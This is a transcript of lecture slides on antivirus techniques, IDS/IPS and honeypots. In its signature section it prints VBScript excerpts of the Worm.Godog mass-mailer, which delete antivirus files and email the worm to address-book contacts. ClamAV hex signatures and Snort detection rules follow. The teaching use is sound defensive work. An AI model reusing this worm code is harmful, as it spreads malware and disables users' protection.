Antivirus, IDS/IPS, Honeypot PDF
Document Details
Uploaded by JollySynecdoche
Vilnius Tech
2024
Dr. Donatas Vitkus
Tags
Summary
This presentation covers antivirus, intrusion detection systems (IDS/IPS), and honeypots. It details definitions, types, actions, detection techniques, and signature methods. The presentation, created in 2023-2024 as an autumn delivery, targets computer science or cybersecurity students.
Full Transcript
Antivirus, IDS/IPS, Honeypot Dr. Donatas Vitkus Vilnius Tech, FMF, ISK 2023-2024 m.m. autumn Definitions False-positive False-negative 2 Antiviruses Antivirusas – identifies, neutralizes, or eliminates m...
Antivirus, IDS/IPS, Honeypot Dr. Donatas Vitkus Vilnius Tech, FMF, ISK 2023-2024 m.m. autumn Definitions False-positive False-negative 2 Antiviruses Antivirusas – identifies, neutralizes, or eliminates malware. At the beginning of the twentieth century were used for protection only against computer viruses. Current antiviruses protect against a lot of malware Virus scanner – malware search mechanism Antiviruses / firewalls / IDS can dublicate each other Commercial aspect 3 Types of antiviruses Scanners – signature+heuristics Revisionists – captures the state of FS Monitors – Monitors potentially dangerous actions Vaccinators – makes the virus think that the file is already infected Classification based on functionality 4 Actions Remove an infected file Block access to an infected file Quarantine (blocking of execution) Removal of the virus from the body of the file - treatment Performing one of the actions after moving 5 Malwares detection techniques Signature-based method Heuristic method Anomalies analysis “Sand box” "Whitelist" method Multi-core / combined 6 Signature method The basis – the unique lines of malware code – removes false-positive Signatures – based on manual creation Advantages: accuracy, reliability, the most widely used recycled technology Disadvantages: does not see new malware/ polymorphic; delay in updates; increase in the signature base and the speed of scanning; a lot of manual work on creating signatures 7 Signature formats– 2 ClamAV (only for.ndb type signatures stored in.ldb files) SignatureName;TargetDescriptionBlock;LogicalExpr ession;Subsig0;Subsig1;Subsig2;... 8 For example: Worm.Godog – 1 Apie: Mass-mailer, AV killer, VB-script Registro = legion.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Pr ogramFilesDir") If FileExists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\Avp32.exe") then path = Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro" legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\*.*") If fileexists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\Avp32.exe") then path = Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal" legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\*.*") if FileExists(Registro & "\Antiviral Toolkit Pro\avp32.exe") then path = Registros & "\Antiviral Toolkit Pro" legions.DeleteFile (Registro & "\Antiviral Toolkit Pro\*.*") if fileexists (Registro & "\AVPersonal\Avguard.exe") then path = Registro & "\AVPersonal" legions.DeleteFile (Registro & "\AVPersonal\*.*") if fileexists (Registro & "\Trend PC-cillin 98\IOMON98.EXE") then path = Registro & "\Trend PC-cillin 98" legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.*") legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.EXE") legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.dll") 9 For example: Worm.Godog – 2 Set Create = CreateObject ("Scripting.FileSystemObject") Set mail = Create.CreateTextFile("C:\mail.vbs") mail.writeline "On Error Resume Next" mail.writeline "Dim leg, Mail, Counter, A, B, C, D, E" mail.writeline "Set leg = CreateObject" & Chr(32)& "(" & chr(34) & "Outlook.Application" & Chr(34) &")" mail.writeline "Set C = CreateObject "& Chr(32) & "(" & chr(34) & "Scripting.FileSystemObject" & Chr(34)& ")" mail.writeline "Set Mail = leg.GetNameSpace" & Chr(32) & "(" & chr(34)& "MAPI" & Chr(34)&")" mail.writeline "For A = 1 To Mail.AddressLists.Count" mail.writeline "Set B = Mail.AddressLists (A)" mail.writeline "Counter = 1" mail.writeline "Set C = leg.CreateItem (0)" mail.writeline "For D = 1 To B.AddressEntries.Count" mail.writeline "E = B.AddressEntries (Counter)" mail.writeline "C.Recipients.Add E" mail.writeline "Counter = Counter + 1" mail.writeline "If Counter > 8000 Then Exit For" mail.writeline "Next" mail.writeline "C.Subject =" & Chr(32) & Chr(34) &"Legion Game" & Chr(34) mail.writeline "C.Body = "& Chr(32) & Chr(34) & "YA jugaste el juego Legion? si no aqui te lo doy checalo y hay me dices que tal..." & Chr(34) mail.writeline "C.Attachments.Add"& Chr(32) & Chr(34) & "C:\Legion.vbs" & Chr(34) mail.writeline "C.DeleteAfterSubmit = True" mail.writeline "C.Send" mail.writeline "Next" mail.Close legion.Run ("C:\mail.vbs") 10 Example of creating a signature- 1 Kaspersky Antivirus Personal/Kaspersky Antivirus Personal Pro (0): 66696c656578697374732028{- 25}202620225c6b6173706572736b79206c61625c6b61737065 72736b7920616e7469766972757320706572736f6e616c{- 100}2e64656c65746566696c652028{- 25}202620225c6b6173706572736b79206c61625c6b61737065 72736b7920616e7469766972757320706572736f6e616c Antiviral Toolkit Pro (1): 66696c6565786973747328{- 25}202620225c616e7469766972616c20746f6f6c6b697420707 26f{-100}2e64656c65746566696c652028{- 25}202620225c616e7469766972616c20746f6f6c6b697420707 26f AVPersonal (2): 66696c656578697374732028{- 25}202620225c6176706572736f6e616c{- 100}2e64656c65746566696c652028{- 25}202620225c6176706572736f6e616c 11 Example of creating a signature- 2 Trend PC-cillin 98 (3): 66696c656578697374732028{- 25}202620225c7472656e642070632d63696c6c696e{- 100}2e64656c65746566696c652028 {- 25}202620225c7472656e642070632d63696c6c696e 666f7220{-10}203d203120746f20{- 10}2e61646472657373656e74726965732e636f756e74{- 100}726563697069656e74732e616464 {-100}696620{- 10}203e20{-5}207468656e206578697420666f72{- 300}2e6174746163686d656e74732e616464{-150}2e73656e64 12 Example of creating a signature- 3 Worm.Godog;Target:0;((0|1|2|3)& (4));66696c656578697374732028 {- 25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e746 9766972757320706572736f6e616c {-100}2e64656c65746566696c652028{-25} 202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e74697 66972757320706572736f6e616c;66696c6565786973747328 {- 25}202620225c616e7469766972616c20746f6f6c6b69742070726f{- 100}2e64656c65746566696c652028 {- 25}202620225c616e7469766972616c20746f6f6c6b69742070726f;66696c6565786 97374732028 {-25}202620225c6176706572736f6e616c{- 100}2e64656c65746566696c652028{- 25}202620225c6176706572736f6e616c;66696c656578697374732028 {- 25}202620225c7472656e642070632d63696c6c696e{- 100}2e64656c65746566696c652028{- 25}202620225c7472656e642070632d63696c6c696e;666f7220 {- 10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{- 100}726563697069656e74732e616464{-100}696620{-10}203e20 {- 5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{- 150}2e73656e64 13 Heuristic method Designed to detect malware when signature not matches 100% Suitable for the detection of *morphic viruses, but not entirely reliable, false-positive, no treatment option For example: monitors actions that are used in a limited way (FDISK, division of partitions); emulation of the functioning of the virus; decompilation and analysis of the percentage of coincidences. 14 Anomalies analysis Monitors: process, trafic, user actions. For example: Whether the process does not modify exe files Advantages: detects new malware, dynamic, adaptive Disadvantages: a very unreliable, high false- positive rate, the Accept button is not read by anyone, some of the suspicious actions observed are performed by legal programs. 15 “Sandbox” The virtual machine on which the malware is executed After the suspected execution of malware, the changes made to the system are analyzed Advantages: efficiency, suitable for professional analysis Disadvantages: high time consumption of a computer resource 16 “White list” Only applications on the "whitelist" are allowed Advantages: no need for signature renewal, effective, suitable for large corporations with a policy of using AE Disadvantages: not very flexible and user-friendly, requires the resources of the administrator's working time 17 Intrusion detection Importance Problems 18 Assumptions Intrusion detection methods are based on the assumption that the behavior of a hacker is different from that of legal users, and this difference can be detected and captured But there is no strict line between legal user behavior and hacker behavior Therefore, IDS only warns that hacking is possible The choice of the optimal interpretation of illegal activities is the main problem of any method of detecting intrusions. 19 Rules-based intrusion detection methods For example: Snort alert tcp $EXTERNAL_NET any -> $HOME_NET 4000 (msg:"EXPLOIT Alt-N SecurityGateway username buffer overflow attempt"; flow:established, to_server; content:"username="; nocase; isdataat:450,relative; content:!"&"; within:450; content:!"|0A|"; within:450; metadata:policy balanced-ips drop, policy connectivity-ips drop, policy security-ips drop; reference:url,secunia.com/advisories/30497/; classtype:attempted- admin; sid:13916; rev:2;) alert tcp $EXTERNAL_NET any -> $HOME_NET 4000 (msg:"EXPLOIT Alt-N SecurityGateway username buffer overflow attempt"; flow:established, to_server; content:"username="; nocase; isdataat:450,relative; content:!"&"; within:450; content:!"|0A|"; within:450; metadata:policy balanced-ips drop, policy connectivity-ips drop, policy security-ips drop; reference:url,secunia.com/advisories/30497/; classtype:attempted- admin; sid:13916; rev:2;) 20 Anomalous-based intrusion detection methods Initial stage: collecting information about the typical behavior of legal users / resources. The data collected is statistically processed and criteria are established that characterize the normal state: threshold criteria and profiles. Profiles are set up: for users, groups, resources. Profiles such as: Number of events in a time interval, time interval, resource usage measure. 21 Methods +/- Rules-based methods Methods based on anomalies 22 IDS / IPS Intrusion detection systems are software that implements intrusion detection techniques. The goal is to detect intrusion, potential security policy violation events, or threats of such violations. IDS are also used to record attack attempts and collect data necessary to prepare security situation assessment reports. Intrusion prevention systems perform all the same functions as IDS, but additionally use automated tools to stop possible attacks. IPS may try to stop attacks: terminate the session; block accesses; change the configuration of other security devices (firewall); modify the information transmitted (remove files infected with malwares) 23 IDS / IPS Components Sensors or agents Management server Database [Dedicated Secure Management Network] 24 NIDS – network-based software/hardware incapable of processing an encrypted trafficient inefficient in the presence of a large traphyx attacks on sensors Pranešimo pvz.: Sep 25 00:03:43 IDS snort: [1:8428:6] WEB-MISC SSLv2 openssl get shared ciphers overflow attempt [Classification: Attempted Administrator Privilege Gain] [Priority: 1]: {TCP} 78.59.190.213:16495 -> 192.168.1.3:443 25 HIDS / FIM – host-based Server / User / Service Software Solutions Active / Passive Agents Realtime / Delayed 26 Honeypot / Honeynet Honeypot ideja Low level of interactivity High level of interactivity Legal aspects of application 27 QUESTIONS 28
